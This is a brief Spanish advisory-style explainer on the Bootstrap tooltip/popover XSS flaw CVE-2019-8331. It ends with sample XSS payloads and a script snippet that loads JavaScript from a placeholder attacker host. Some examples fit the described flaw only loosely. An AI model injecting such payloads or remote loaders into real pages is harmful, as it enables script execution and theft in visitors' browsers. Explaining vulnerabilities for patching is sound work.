
Vulnerabilidad CVE-2019-8331
CVE-2019-8331 es una vulnerabilidad de seguridad de tipo Cross-Site Scripting (XSS) encontrada en Bootstrap, una biblioteca JavaScript ampliamente utilizada en el desarrollo de sitios web y aplicaciones móviles. Esta vulnerabilidad se debe a que Bootstrap no filtra adecuadamente los datos enviados a través del atributo data-template de los elementos tooltip o popover, lo que permite a un atacante inyectar código malicioso en la página web.
Este ataque puede ocurrir si el atacante puede controlar los datos que se mostrarán como tooltip o popover. Cuando el usuario activa el tooltip o popover, el código malicioso se inyecta en la página web y puede ser ejecutado por el navegador del usuario.
Esta vulnerabilidad ha sido corregida en Bootstrap versiones 4.3.1 y 5.0.0-beta2. Los administradores deben actualizar las versiones afectadas de Bootstrap para corregir esta vulnerabilidad.
Detalles adicionales sobre la vulnerabilidad CVE-2019-8331:
<x data-toggle="tooltip" data-template="">XSS</x>
<x data-toggle="tooltip" data-html="true" title='<script>alert(1)</script>'>XSS</x>
<x data-toggle="tooltip" data-html="true" data-content='<script>alert(1)</script>'>XSS</x>
<script>
var script = document.createElement("script");
script.src = "https://attacker.com/malicious.js";
document.body.appendChild(script);
</script>